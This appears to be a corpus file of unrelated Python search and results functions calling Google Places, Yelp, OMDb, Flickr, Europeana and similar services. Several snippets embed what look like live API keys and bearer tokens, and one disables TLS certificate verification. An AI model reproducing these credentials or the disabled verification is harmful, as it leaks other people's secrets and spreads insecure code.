"def get_google_results(api_id, address, return_response_fields=None):\n # set up api key\n api_key = \"AIzaSyDQaVh67imEZW2FLH7hb33SB63jv2shkqQ\"\n request_url = \"\"\n outputs = []\n building = address[0]\n address1 = address[0] + \" \" + address[1] + \" \" + address[2]\n if api_id == \"geocoding\":\n request_url = \"https://maps.googleapis.com/maps/api/geocode/json?address={}\".format(\n address1) + \"&key={}\".format(\n api_key)\n print(\"GEOCODING |||||||||| \" + request_url)\n if api_id == \"nearbysearch\":\n lat_long = get_google_results(\"geocoding\", address, return_response_fields=\"latitude\")[0][\n \"latitude\"].__str__() + \",\" + \\\n get_google_results(\"geocoding\", address, return_response_fields=\"longitude\")[0][\n \"longitude\"].__str__()\n request_url = \"https://maps.googleapis.com/maps/api/place/nearbysearch/json?location={}\".format(\n lat_long) + \"&rankby=distance&type=establishment&key={}\".format(api_key)\n print(\"NEARBYSEARCH |||||||||| \" + request_url)\n results = requests.get(request_url)\n results = results.json()\n\n if len(results['results']) == 0:\n return False\n else:\n for answer in results['results']:\n if api_id == \"geocoding\":\n\n street_number = \"0\"\n for y in answer.get('address_components'):\n if 'street_number' in y.get('types'): street_number = y['long_name']\n\n route_name = \"0\"\n for z in answer.get('address_components'):\n if 'route' in z.get('types'): route_name = z['long_name']\n\n output = {\n \"entry\": building,\n \"street_number\": street_number,\n \"route_name\": route_name,\n \"latitude\": answer.get('geometry').get('location').get('lat'),\n \"longitude\": answer.get('geometry').get('location').get('lng'),\n \"google_place_id\": answer.get(\"place_id\"),\n \"type\": \",\".join(answer.get('types')),\n \"postcode\": \",\".join(\n [x['long_name'] for x in answer.get('address_components') if 'postal_code' in x.get('types')]),\n\n }\n if (output[\"route_name\"]) == \"0\":\n output[\"route_name\"] = answer.get('formatted_address')\n if (output[\"street_number\"]) == \"0\":\n\n pattern = re.compile(\"^(.+?),\")\n pattern0 = re.compile(\",(.+?),\")\n patterns = [pattern, pattern0]\n for pat in patterns:\n if pat.search(answer.get('formatted_address')):\n\n ad = re.findall(pat, answer.get('formatted_address'))[0]\n pattern1 = re.compile(\"\\d+\")\n if pattern1.search(ad):\n ad1 = re.findall(pattern1, ad)[0]\n if len(ad1) < 4: output[\"street_number\"] = ad1\n\n outputs += [output]\n\n if api_id == \"nearbysearch\":\n street_number = \"0\"\n route_name = answer.get('vicinity')\n if answer.get('rating') is None:\n rating = 0\n else:\n rating = int(answer.get('rating'))\n\n output = {'input_string': address1, \"street_number\": street_number, \"route_name\": route_name,\n \"google_place_id\": answer.get(\"place_id\"), \"type\": \",\".join(answer.get('types')),\n \"rating\": rating}\n\n pattern = re.compile(\"^(.+?),\")\n pattern0 = re.compile(\",(.+?),\")\n patterns = [pattern, pattern0]\n for pat in patterns:\n if pat.search(route_name):\n\n ad = re.findall(pat, answer.get('vicinity'))[0]\n pattern1 = re.compile(\"\\d+\")\n if pattern1.search(ad):\n ad1 = re.findall(pattern1, ad)[0]\n if len(ad1) < 4: output[\"street_number\"] = ad1\n\n if output[\"street_number\"] == address[0]:\n outputs += [output]\n\n if return_response_fields is None and len(outputs) > 0:\n return outputs\n elif (len(outputs) > 0) and (return_response_fields is not None):\n output_filter = []\n for item in outputs:\n output_filter += [{\"\" + return_response_fields: 
item[return_response_fields]}]\n outputs = output_filter\n return outputs\n else:\n return False",
"def search_for_adaptation():\n\n book_id = 0\n # variables for status results; 0 for no error, 1 for no book found, 2 for no movie found,\n # 3 for no tv show found, 4 for no tv show and movie found\n status_msg = \"\"\n status_num = 0\n\n # if the Random Book button is chosen, then select a random book from the list\n # try to match the book with a movie or tv show until one is found\n if request.args.get('random') == \"1\":\n search_term = data_functions.get_random_book()\n else:\n # if search input is used, then get the search term\n search_term = request.form['search'] # get search term from input box\n\n # Goodreads API functions\n gr_result = API_functions.request_book(search_term) # use function in API_functions.py\n\n # if no book is found, generate status code\n if gr_result[\"total\"] == 0:\n status_msg = \"No matching book found for {0}. Try another.\".format(search_term)\n status_num = 1\n\n # TheMovieDB functions\n movie_result = {} # empty dictionary\n tv_result = {} # empty dictionary\n if status_num == 0: # only continue if there is a book found\n # search for movie\n # use function in API_functions.py\n movie_result = API_functions.request_movie(gr_result[\"name_split\"], gr_result[\"author_name_clean\"], 0)\n\n if movie_result[\"total_results\"] != 0: # if a movie is found, save some of its data\n movie_id = movie_result[\"id\"] # save movie ID\n\n else: # if no movie is found, generate status message\n status_msg = \"No movie found. Try another.\"\n status_num = 2\n\n # search for TV show\n # use function in API_functions.py\n tv_result = API_functions.request_tv_show(gr_result[\"name_split\"], gr_result[\"author_name_clean\"], 0)\n\n if tv_result[\"total_results\"] != 0: # if a tv show is found, save some of its data\n tv_id = tv_result[\"id\"] # save tv ID\n\n else: # if no tv show is found, generate status message\n status_msg = \"No TV Show found. Try another.\"\n status_num = 3\n\n if movie_result[\"total_results\"] == 0 and tv_result[\"total_results\"] == 0:\n # if no movie and tv show found, generate status message.\n # in the case they are found, but not based on the book, generate the same message\n status_msg = \"No adaptation found for {0}. Try another.\".format(search_term)\n status_num = 4\n\n if previous_searches.count(\n gr_result[\"name_split\"]) == 0 and status_num != 4: # only add if book name is not in deque\n if len(previous_searches) == 5: # keep the deque at only five most recent searches\n previous_searches.pop() # remove one if there is already five\n previous_searches.appendleft(gr_result[\"name_split\"]) # add recent search to beginning of deque\n # render the page again with updated information, pass all data to render_template method\n return render_template(\"index.html\", book_id=book_id, book_data=gr_result, movie_data=movie_result,\n tv_data=tv_result, app_name=app_name, search=search_term, status_msg=status_msg,\n status_num=status_num, previous_searches=previous_searches)",
"def getResults(self, name):\n returnString = marketSet[name].getResults()\n marketSet[name].webCrawler.nextPage()\n return json.dumps(returnString, cls=Encoder)",
"def results(self, query=None, batch=True, b_size=10, b_start=0):\n # Disable theming for ajax requests\n if 'ajax' in self.request.form:\n del self.request.form['ajax']\n self.request.response.setHeader('X-Theme-Disabled', 'True')\n\n if query is None:\n query = {}\n\n query['b_start'] = b_start = int(b_start)\n query['b_size'] = b_size\n query = self.filter_query(query)\n\n if query is None:\n results = []\n else:\n query.update({'qt': 'hlsearch'});\n catalog = getToolByName(self.context, 'portal_catalog')\n try:\n results = catalog(**query)\n except ParseError:\n logger.exception('Exception while searching')\n return []\n except SolrException:\n logger.exception('Exception while searching')\n return []\n\n self.solr_response = results\n results = IContentListing(results)\n if batch:\n results = Batch(results, b_size, b_start)\n return results",
"def GetResults(self):\n return self._results",
"def _mw_search(self, baseurl, searchquery):\n params = urllib.parse.urlencode({\n 'action': 'opensearch',\n 'search': searchquery,\n 'format': 'json',\n })\n api_data = self._mw_api_call(baseurl, params)\n\n search_result_titles = api_data[1]\n if not search_result_titles:\n raise callbacks.Error(f\"No search results for {searchquery!r}\")\n return search_result_titles",
"def _collect_results(self, request_method, request_args, request_kwargs={}, request_params={}):\n results = []\n cursor = None\n page_params = copy.copy(request_params)\n\n while True:\n if cursor:\n page_params['cursor'] = cursor\n response = request_method(\n *request_args,\n **request_kwargs,\n params=page_params\n )\n _raise_on_error(response)\n response_json = response.json()\n results.extend(response_json['results'])\n if response_json['next']:\n cursor = get_cursor_from_url(response_json['next'])\n else:\n return results",
"def search_results(self):\r\n route_name = self.request.matched_route.name\r\n mdict = self.matchdict\r\n rdict = self.GET\r\n\r\n if 'terms' in mdict:\r\n phrase = \" \".join(mdict['terms'])\r\n else:\r\n phrase = rdict.get('search', '')\r\n\r\n # Always search the fulltext content\r\n with_content = True\r\n\r\n conn_str = self.settings.get('sqlalchemy.url', False)\r\n searcher = get_fulltext_handler(conn_str)\r\n\r\n # check if we have a page count submitted\r\n params = self.params\r\n page = params.get('page', 0)\r\n count = params.get('count', 50)\r\n\r\n if rdict.get('search_mine') or 'username' in mdict:\r\n with_user = True\r\n else:\r\n with_user = False\r\n\r\n username = None\r\n if with_user:\r\n if 'username' in mdict:\r\n username = mdict.get('username')\r\n elif self.request.user and self.request.user.username:\r\n username = self.request.user.username\r\n\r\n res_list = searcher.search(\r\n phrase,\r\n content=with_content,\r\n username=username if with_user else None,\r\n ct=count,\r\n page=page,\r\n )\r\n\r\n # if the route name is search_ajax we want a json response\r\n # else we just want to return the payload data to the mako template\r\n if 'ajax' in route_name or 'api' in route_name:\r\n return {\r\n 'success': True,\r\n 'message': \"\",\r\n 'payload': {\r\n 'search_results': [dict(res) for res in res_list],\r\n 'result_count': len(res_list),\r\n 'phrase': phrase,\r\n 'page': page,\r\n 'username': username,\r\n }\r\n }\r\n else:\r\n return {\r\n 'search_results': res_list,\r\n 'count': len(res_list),\r\n 'max_count': 50,\r\n 'phrase': phrase,\r\n 'page': page,\r\n 'username': username,\r\n }",
"def search_all_view(request): # searchAll\n voter_device_id = get_voter_device_id(request) # We standardize how we take in the voter_device_id\n text_from_search_field = request.GET.get('text_from_search_field', '')\n search_scope_list = request.GET.getlist('search_scope_list[]')\n search_scope_list = list(filter(None, search_scope_list))\n # search_scope_list options\n # PN = POLITICIAN_NAME\n\n if not positive_value_exists(text_from_search_field):\n status = 'MISSING_TEXT_FROM_SEARCH_FIELD'\n json_data = {\n 'status': status,\n 'success': False,\n 'text_from_search_field': text_from_search_field,\n 'voter_device_id': voter_device_id,\n 'search_results': [],\n }\n return HttpResponse(json.dumps(json_data), content_type='application/json')\n\n results = search_all_for_api(\n text_from_search_field=text_from_search_field,\n voter_device_id=voter_device_id,\n search_scope_list=search_scope_list)\n # results = search_all_elastic_for_api(text_from_search_field, voter_device_id) #\n status = \"UNABLE_TO_FIND_ANY_SEARCH_RESULTS \"\n search_results = []\n if results['search_results_found']:\n search_results = results['search_results']\n status = results['status']\n else:\n status += results['status']\n\n json_data = {\n 'status': status,\n 'success': True,\n 'text_from_search_field': text_from_search_field,\n 'voter_device_id': voter_device_id,\n 'search_results': search_results,\n }\n return HttpResponse(json.dumps(json_data), content_type='application/json')",
"def query_google(lat='38.890762', lon='-77.084755', radius='400', keywords=['coffee', 'cafe', 'brunch']):\n base_url = \"https://maps.googleapis.com/maps/api/place/nearbysearch/json\"\n location = f\"{lat}, {lon}\"\n for kw in keywords:\n params = {\n \"key\": codecs.decode(config['google']['api_key'], 'rot-13'),\n \"type\": 'food',\n \"rankby\": 'prominence',\n \"location\": location,\n \"radius\": radius,\n \"keyword\": kw\n }\n\n try:\n response = requests.get(base_url, params=params).json()\n key_results_list = response['results']\n except Exception as e:\n print(f'error in query_google {e}')\n\n #passes to this point\n print(f'query_google - key_results_list: {key_results_list}')\n\n if \"next_page_token\" in response:\n params = {\n \"key\": codecs.decode(config['google']['api_key'], 'rot-13'),\n \"type\": 'food',\n \"rankby\": 'prominence',\n \"location\": location,\n \"radius\": radius,\n \"keyword\": kw,\n \"pagetoken\": response[\"next_page_token\"]\n }\n\n response_next_page = requests.get(base_url, params=params).json()\n key_results_list = key_results_list + response_next_page['results']\n print(response_next_page)\n\n else:\n print(\"no next page\")\n\n for kr in key_results_list:\n kr[\"keyword\"] = kw\n print(f'key results list length is: {len(kr)}')\n\n #db.get_collection(\"google_places\").delete_many({}) # This needs to be moved into Flask to aggregate results\n db.get_collection(\"google_places\").insert_many(key_results_list)",
"def _parse_json_response(self, query, results):\n\n response = Response(query.terms, query)\n content = json.loads(results.text)\n\n result_type = query.result_type\n if not result_type:\n result_type = self.default_result_type\n\n # Check to see if the response contains any API errors.\n self._check_errors(content)\n\n # By default, Facebook returns 5000 results. While it returns a pagination key, it seems to do nothing.\n response.no_more_results = True\n\n if result_type== 'user' or not query.result_type:\n # Sample response\n # {\n # \"data\": [\n # {\n # \"name\": \"John Doe\",\n # \"id\": \"999999999999999\"\n # },\n # {\n # \"name\": \"John Doe\",\n # \"id\": \"88888888888888\"\n # }\n # ],\n # \"paging\": {\n # \"next\": \"long_url\"\n # }\n # }\n\n # The base URL is used to create the link to the profile, it will redirect to a permanent user URL.\n base_url= \"https://www.facebook.com/app_scoped_user_id/\"\n\n for user in content[u'data']:\n name = user[u'name']\n tempid = user[u'id']\n url = base_url + tempid + '/'\n text=''\n img = \"https://graph.facebook.com/{}/picture?type=normal\".format(tempid)\n # Minimal information, probably need a second round of querying the API for each user to get something\n # for the snippet. Better way?\n response.add_result(title=name, url=url, summary=text, imageurl=img)\n\n # Implement the other search types!\n return response",
"def search_results(request):\r\n mdict = request.matchdict\r\n rdict = request.GET\r\n\r\n if 'terms' in mdict:\r\n phrase = \" \".join(mdict['terms'])\r\n else:\r\n phrase = rdict.get('search', '')\r\n\r\n if rdict.get('search_mine') or 'username' in mdict:\r\n with_user = True\r\n else:\r\n with_user = False\r\n\r\n username = None\r\n if with_user:\r\n if 'username' in mdict:\r\n username = mdict.get('username')\r\n elif request.user and request.user.username:\r\n username = request.user.username\r\n\r\n # with content is always in the get string\r\n search_content = asbool(rdict.get('with_content', False))\r\n\r\n conn_str = request.registry.settings.get('sqlalchemy.url', False)\r\n searcher = get_fulltext_handler(conn_str)\r\n\r\n # check if we have a page count submitted\r\n page = rdict.get('page', 0)\r\n count = rdict.get('count', 10)\r\n\r\n try:\r\n res_list = searcher.search(\r\n phrase,\r\n content=search_content,\r\n username=username if with_user else None,\r\n ct=count,\r\n page=page\r\n )\r\n except ValueError:\r\n request.response.status_int = 404\r\n ret = {'error': \"Bad Request: Page number out of bound\"}\r\n return _api_response(request, ret)\r\n\r\n constructed_results = []\r\n for res in res_list:\r\n return_obj = dict(res)\r\n return_obj['tags'] = [dict(tag[1]) for tag in res.tags.items()]\r\n\r\n # the hashed object is there as well, we need to pull the url and\r\n # clicks from it as total_clicks\r\n return_obj['url'] = res.hashed.url\r\n return_obj['total_clicks'] = res.hashed.clicks\r\n\r\n constructed_results.append(return_obj)\r\n\r\n return _api_response(request, {\r\n 'search_results': constructed_results,\r\n 'result_count': len(constructed_results),\r\n 'phrase': phrase,\r\n 'page': page,\r\n 'with_content': search_content,\r\n 'username': username,\r\n })",
"def get_search_results(rows, cursor):\n search_url = 'http://www.europeana.eu/api/v2/search.json?wskey=' + \\\n config.APIKEY + \\\n '&profile=minimal&rows=%d' + \\\n '&cursor=%s' + \\\n '&query=%s'\n\n # split query off to better deal with escaping\n search_query = '*%3A*' + \\\n '&qf=DATA_PROVIDER%3A%22Nationalmuseum%2C+Sweden%22' + \\\n '&qf=what%3A+paintings' + \\\n '&qf=PROVIDER%3A%22AthenaPlus%22'\n\n overview_page = urllib2.urlopen(search_url % (rows, cursor, search_query))\n overview_json_data = json.loads(overview_page.read())\n overview_page.close()\n return overview_json_data",
"def query_api(price, location, categories, radius, openat):\n bearer_token = 'B5XYOw2fqoxnXH5dUEaf3Mp57gTsUkGHQBiDa8viH1uYQDlCxox7p9G0b45QVr2BiJkziIGWaPhjdQhd-xtfhf1AUZ9yx2Xejn3GTNPEojfgCAVOn7stSbYvKDJ6WXYx'\n\n response = search(bearer_token, price, location, categories, radius, openat)\n\n businesses = response.get('businesses')\n\n if not businesses:\n print(u'No businesses for {0} in {1} found.'.format(price, location))\n return\n\n business_data = []\n\n for index, biz in enumerate(businesses):\n biz_id = businesses[index]['id']\n response = get_business(bearer_token, biz_id)\n\n business_data.append(response)\n # pprint.pprint(response, indent=2)\n\n # Get reviews for business\n reviews = get_reviews(bearer_token, biz_id)\n\n business_data[index]['reviews'] = reviews\n\n return business_data",
"def get_search_parameters(self, name):\n\t\tparams = {}\n\t\tparams[\"term\"] = str(name)\n\t\tparams[\"sort\"] = \"0\"\n\t\tparams[\"radius.filter\"] = \"2000\"\n\t\tparams[\"limit\"] = \"1\" #return the first search item\n\t\tparams[\"location\"] = \"Mesa, AZ\"\n\t\treturn params",
"def perform_search(sdk: Intel, srch: str, types: list, tformat: str, rev: bool, prfx: str):\n print(f\"Searching Falcon Threat Intelligence for {bold(srch)}.\")\n # Search each result type asynchronously\n futures = {}\n with ThreadPoolExecutor() as executor:\n if \"actor\" in types:\n futures[\"actors\"] = executor.submit(\n batch_get, func=sdk.query_actor_entities, filt=f\"name:*'*{srch}*'\", catg=\"actor\"\n )\n if \"indicator\" in types:\n futures[\"indicators\"] = executor.submit(\n batch_get, func=sdk.query_indicator_entities,\n filt=f\"indicator:*'*{srch}*'\", catg=\"indicator\"\n )\n if \"report\" in types:\n futures[\"reports\"] = executor.submit(\n batch_get, func=sdk.query_report_entities, filt=f\"name:*'*{srch}*'\", catg=\"report\"\n )\n act_result, ind_result, rep_result = ([], [], [])\n for cat, fut in futures.items():\n if cat == \"actors\":\n act_result = fut.result()\n display_actors(act_result, rev, tformat, prfx)\n\n if cat == \"indicators\":\n ind_result = fut.result()\n display_indicators(ind_result, rev, tformat, prfx)\n\n if cat == \"reports\":\n rep_result = fut.result()\n display_reports(rep_result, rev, tformat, prfx)\n\n if not ind_result and not rep_result and not act_result:\n not_found(types, srch)\n\n return len(act_result), len(ind_result), len(rep_result)",
"def search(self):\n premium = self.config.get('premium', False)\n\n self.params[self.opts['keyword']['query_key']] = self.config[self.opts['keyword']['config_key']] # keyword\n # Selection params\n self.append_param('tag_mode', 'selection')\n if premium:\n self.append_param('order_premium', 'selection')\n else:\n self.append_param('order_not_premium', 'selection')\n\n self.append_param('type', 'selection')\n self.append_param('tool', 'selection')\n self.append_param('ratio', 'selection')\n self.append_param('mode', 'selection')\n\n # Number params\n self.append_param('min_width', 'number')\n self.append_param('max_width', 'number')\n self.append_param('min_height', 'number')\n self.append_param('max_height', 'number')\n if premium:\n self.append_param('min_bookmark', 'number')\n self.append_param('max_bookmark', 'number')\n else:\n self.set_bookmark_filter()\n\n # Date params\n self.append_param('start_time', 'date')\n self.append_param('end_time', 'date')\n\n # multi work filter\n self.filters['multi'] = self.config.get('download_multi', False)\n\n for i in range(self.config['start_page'], self.config['end_page'] + 1):\n self.params['p'] = i\n self.headers['Referer'] = 'https://www.pixiv.net/'\n url ='https://www.pixiv.net/search.php'\n html = self.session.get(url, headers = self.headers, params = self.params, timeout = 10, proxies = self.proxies)\n\n soup = BeautifulSoup(html.text, 'lxml')\n data_items = json.loads(soup.find('input', id = 'js-mount-point-search-result-list')['data-items'])\n\n return self.extract_work_info(data_items)",
"def get_results_for(t_client, search_q):\n results = t_client.search(q=\"#\"+search_q)\n\n # This can be refactored\n return [\n {\n \"author\": \"@%s\" % t.from_user,\n \"text\": t.text,\n \"id\": t.id,\n \"date_h\": t.created_at.strftime(\"%H:%M:%S %d/%m/%Y\"),\n \"date\": time.mktime(t.created_at.timetuple()),\n } for t in results\n ]",
"def fetch(self, **kwargs):\n page = kwargs.get('page', 1)\n if page is None:\n page = 1\n elif page > self.max_pages:\n page = self.max_pages\n\n start_index = ((page - 1) * self.max_results_per_page)\n\n end_index = kwargs.get('num', start_index + self.max_results_per_page)\n if end_index is None:\n end_index = start_index + self.max_results_per_page\n\n headers = {\n 'Username': self.engine_info['ISCAPE_SEARCH_USERNAME'],\n 'Userkey': self.engine_info['ISCAPE_SEARCH_USER_KEY']\n }\n\n data = {\n 'query': kwargs.pop('query', ''),\n 'installation_id': self.engine_info['INSTALLATION_ID'],\n 'page_start': start_index,\n 'page_end': end_index\n }\n\n if getattr(settings, 'USE_V2_API', False):\n query_endpoint = self.engine_info['QUERY_ENDPOINT'].format(\n data.get('installation_id', ''))\n else:\n query_endpoint = self.engine_info['QUERY_ENDPOINT']\n req = requests.Request(\n 'POST',\n query_endpoint,\n headers=headers,\n data=data)\n prepared_request = req.prepare()\n pretty_print_POST(prepared_request)\n session = requests.Session()\n session.verify = False\n\n try:\n response = session.send(prepared_request)\n logger.warning(\" RESPONSE: {0}\".format(response.content))\n response.raise_for_status()\n except Exception as e: # this might have to change for bad responses...\n logger.exception(str(e))\n else:\n return response.json()",
"def _handle_search_results(self, response: TextResponse) -> ScrapyYelpItem:\n\n # get yConfig\n pattern = re.compile(r\"\"\"\\n\\s+yConfig\\s+=\\s+\"\"\", re.MULTILINE | re.DOTALL)\n soup = BeautifulSoup(response.text, \"html.parser\")\n script = soup.find(\"script\", text=pattern)\n myjson = script.get_text()\n # remove start pattern (js assignment)\n s = re.sub(pattern, '', myjson)\n # remove html (parser problems)\n s = re.sub('<[^<]+?>', '', s)\n # remove last semi colon (end-of-data)\n s = s[0:s.rfind(';')]\n json_object = json.loads(s,strict=False)\n\n keys = [x for x in json_object[\"js_display\"][\"hovercard_data\"] if x.isnumeric()]\n # first part is the hovercard data - which contains most of the aggregate biz informative\n # such as total_reviews and summary_score\n df_hovercard_data = pd.DataFrame()\n for x in keys:\n tmpdf = json_normalize(json_object[\"js_display\"][\"hovercard_data\"][x])\n df_hovercard_data = df_hovercard_data.append(tmpdf,ignore_index=True)\n\n df_hovercard_data = df_hovercard_data.set_index(\"result_number\")\n df_hovercard_data.index = df_hovercard_data.index.astype(int)\n # second part is the resourceid which might be useful later on, not sure if this is used at all, but\n # it serves as a good example of how to join to other \"parts\" of the nested json structure and flatten it\n df_markers = json_normalize(json_object[\"js_display\"][\"map_state\"][\"markers\"])\n df_markers = df_markers[df_markers['resourceType'] == 'business'].loc[:, [\"url\",\"resourceId\",\"hovercardId\",\"label\",\"location.latitude\",\"location.longitude\",]]\n df_markers = df_markers.set_index('label')\n df_markers.index = df_markers.index.astype(int)\n\n # combine data into a single dataframe which will eventually be written out by our pipeline\n df = df_hovercard_data.join(df_markers)\n\n # at this point we want to also scrape the indvidual biz listing for the menu, syntax is verbose here\n\n\n ## deubg write to file\n #json_formatted = json.dumps(json_object, indent=2)\n # print(json_formatted)\n # with open(\"files/\"+'blah.json', 'wb') as file:\n # file.write(str.encode(json_formatted))\n\n \"\"\"\n\n Here is a smample of what the yConfig object looks like:\n\n json_object.keys() ====>\n ['cookies', 'gaConfig', 'adjustAndroidPaidTrafficUrl', 'webviewFlow', 'enabledSitRepChannels',\n isWebviewRequest', 'js_display', 'isLoggedIn', 'uaInfo', 'isSitRepEnabled', 'comscore', 'isBugsnagEnabled',\n 'support', 'deprecatedEncryptedYUV', 'vendorExternalURLs', 'smartBannerFallbackActive', 'version',\n 'recaptchaV3PublicKey', 'googlePlacesUrl', 'redesignActive', 'currentBaseLang', 'isClientErrorsEnabled',\n 'uniqueRequestId', 'yelpcodeTemplateVersion', 'appInstallDialogEnabled', 'smartBannerPersistent',\n 'imageUrls', 'siteUrl', 'referrer', 'webviewInfo', 'cookieDomain', 'recaptchaPublicKey',\n 'send_user_agent_to_ga', 'pGifUrl']\n\n\n json_object[\"js_display\"].keys() ===>\n ['polyglot_translations', 'raq_links', 'locale', 'hovercard_data', 'is_first_ad_hovercard_opened',\n 'zoom', 'centerLng', 'map_state', 'advertising_business_id_list', 'centerLat', 'pager']\n\n json_object[\"js_display\"][\"hovercard_data\"] ==>\n '1': {'resource_id': None,\n 'result_number': 1,\n 'biz': {'alias': 'lou-malnatis-pizzeria-chicago',\n 'review_count': 5998,\n 'name': \"Lou Malnati's Pizzeria\",\n 'rating': 4.07785928642881,\n 'url': 'https://m.yelp.com/biz/lou-malnatis-pizzeria-chicago',\n 'price': '$$',\n 'categories': 'Pizza, Italian, Sandwiches',\n 'distance': '2.5 mi'},\n 'lat': 41.890357,\n 
'lng': -87.633704,\n 'type': 'natural'},\n '2': {'resource_id': None,\n ....\n\n\n json_object[\"js_display\"][\"map_state\"][\"markers\"] ===>\n [{'resourceType': 'business',\n 'url': '/biz/lou-malnatis-pizzeria-chicago',\n 'resourceId': '8vFJH_paXsMocmEO_KAa3w',\n 'label': '1',\n 'shouldOpenInNewTab': False,\n 'location': {'latitude': 41.890357, 'longitude': -87.633704},\n 'key': 1,\n 'hovercardId': 'Q6nXAEw3UuAVFSztE4lPnA',\n 'icon': {'name': 'business',\n 'anchorOffset': [12, 32],\n 'activeOrigin': [24, 0],\n 'scaledSize': [48, 320],\n 'regularUri': 'https://media0.fl.yelpcdn.com/mapmarkers/yelp_map_range/20160801/1/10.png',\n 'size': [24, 32],\n 'activeUri': 'https://media0.fl.yelpcdn.com/mapmarkers/yelp_map_range/20160801/1/10.png',\n 'regularOrigin': [0, 0]}},\n {'resourceType': 'business',\n 'url': '/biz/pequods-pizzeria-chicago',\n 'resourceId': 'DXwSYgiXqIVNdO9dazel6w',\n 'label': '2',\n 'shouldOpenInNew\n ...\n\n \"\"\"\n #print(json_object[\"js_display\"][\"hovercard_data\"])\n\n\n\n return df",
"def listSearches(self, authenticationToken):\r\n pass",
"def the_search_function(company_name, top_count=5):\n main_company = company_data[company_data.name == company_name].iloc[0]\n\n if top_count == 1:\n search_str = \"\\nSearching for the closest company to %s...\\n\" \\\n % (main_company[\"name\"])\n\n else:\n search_str = \"\\nSearching for top %g closest companies to %s...\\n\" \\\n % (top_count, main_company[\"name\"])\n\n print search_str\n\n matching_companies = match_keywords_descriptions(main_company) \n search_results = search_descriptions(matching_companies, main_company, \n top_count)\n\n if search_results:\n print \"Results:\"\n\n for result in search_results:\n print \"\\t\" + result\n\n else:\n print \"No results available\"",
"def search(query, max: int = None):\n for post in client.search(query, max=max):\n print(json.dumps(post))",
"def lookup(title):\n\n # Contact API\n try:\n api_key = os.environ.get(\"API_KEY\")\n response = requests.get(\n f\"http://www.omdbapi.com/?s={title}&apikey=ced7be9a\")\n response.raise_for_status()\n except requests.RequestException:\n return None\n\n # parse response\n try:\n movie = response.json()\n search = movie[\"Search\"]\n search_list = []\n for i in range(len(search)):\n search_prop = {\"title\": search[i][\"Title\"],\n \"year\": search[i][\"Year\"], \n \"poster\": search[i][\"Poster\"],\n \"id\": search[i][\"imdbID\"]}\n search_list.append(search_prop)\n\n return search_list\n\n except (KeyError, TypeError, ValueError):\n return None",
"def get_search_results(self):\n return self.get_list_of_names(self.SEARCH_RESULTS)",
"def parse_flickr_json(site, query, results):\n response = Response()\n response.version = 'json'\n response.feed.setdefault('title', \"{0}: {1}\".format(site, query))\n response.feed.setdefault('link', results['link'])\n response.feed.setdefault('description', \"Search results for '{0}' at {1}\".format(query, site))\n response.namespaces.setdefault(\"opensearch\", \"http://a9.com/-/spec/opensearch/1.1/\")\n try:\n response.feed.setdefault(\"opensearch_totalresults\", int(results['total']))\n response.feed.setdefault(\"opensearch_itemsperpage\", int(results['perpage']))\n response.feed.setdefault(\"opensearch_startindex\", int(results['page']))\n except KeyError:\n response.feed.setdefault(\"opensearch_totalresults\", 0)\n response.feed.setdefault(\"opensearch_itemsperpage\", 0)\n response.feed.setdefault(\"opensearch_startindex\", 0)\n \n if 'photo' in results:\n for result in results['photo']:\n # Links need to be created from several fields - see the Flickr API for a detailed explanation\n \n try:\n resultLink = \"http://www.flickr.com/photos/{0}/{1}\".format(result['owner'], result['id'])\n resultThumbnail = \"http://farm{0}.static.flickr.com/{1}/{2}_{3}_t.jpg\".format(result['farm'], result['server'], result['id'], result['secret'])\n resultSummary = \"Photo result for '{0}' from {1}\".format(query, site)\n response.entries.append({'title': result['title'], 'link': resultLink, 'summary': resultSummary, 'thumbnail': resultThumbnail})\n except Exception, e:\n print \"Skipping a result due to: {0} \\nWhen parsing a result from: {1}\\n\".format(e, results['link'])\n continue\n \n return response\n\n\t# Try and get the API key from config, if it's not there raise an API Key error - the application will have to deal with this",
"def get_items(id_name, request, client):\n result = client.quick_search(request)\n \n items_pages = []\n limit_to_x_pages = None\n for page in result.iter(limit_to_x_pages):\n items_pages.append(page.get())\n\n items = [item for page in items_pages for item in page['features']]\n \n \n return (id_name, items)",
"def shortsearch(term,location):\n results = search(term,location)['listings']\n result = []\n for business in results:\n result.append([business['id'],business['name'],\"Yellow Pages\"])\n return result",
"def do_search(self, *args, **kwargs):\n return [{}]",
"def __aux_search(self, url, page_limit):\n info = list()\n count = 1\n while True:\n try:\n print(\"[+] Getting page {} result\".format(count))\n if page_limit >= count:\n jdata, response = get_response(url, apikey=self.apikey, params=self.params)\n count += 1\n if jdata and 'data' in jdata:\n info += jdata['data']\n if response and jdata.get('links', {}).get('next', '') != response.url:\n url = jdata['links']['next']\n else:\n break\n else:\n break\n except Exception as e:\n print(e)\n count += 1\n if page_limit >= count:\n break\n\n return info",
"def search_items(title, return_fields=None, access_token=None, endpoint=None, **search_fields):\n if not title:\n return []\n\n if return_fields is not None:\n return_fields = ','.join(return_fields)\n\n return _get_api('search/',\n title=title,\n fields=return_fields,\n access_token=access_token,\n endpoint=endpoint,\n **search_fields)",
"def api_get_advancedcomputersearch_by_name(name):\n\n auth_tuple = (API_USER, API_PASS)\n headers = { 'Accept': 'application/json' }\n url = f'{API_URL}/JSSResource/advancedcomputersearches/name/{name}'\n\n LOGGER.debug(f'URL generated: {url}')\n\n try:\n r = requests.get(url, auth=auth_tuple, headers=headers)\n except requests.exceptions.RequestException as e:\n LOGGER.error(e)\n return None\n return r.json()",
"def get_results(self):\n return self.results",
"def get_results(self):\n return self.results",
"def test_get_results(self):\n pass",
"def query_api(location):\n #bearer_token = obtain_bearer_token(API_HOST, TOKEN_PATH)\n bearer_token ='SHdrjUqMJXqXBKUc7bGIplM8y6tnbwZbXXDbWPCd9wWMP8tX9PdJrC5MZHwJRhb7jMtLjXxT-hsWjNf2OkdiDWd30HsS84AVI5iRnrpxkak3HbWXAdUKvraQ_wgXWXYx'\n response = transaction_search(bearer_token,location)\n response = response.get('businesses')\n return response",
"def getSearch(self, authenticationToken, guid):\r\n pass",
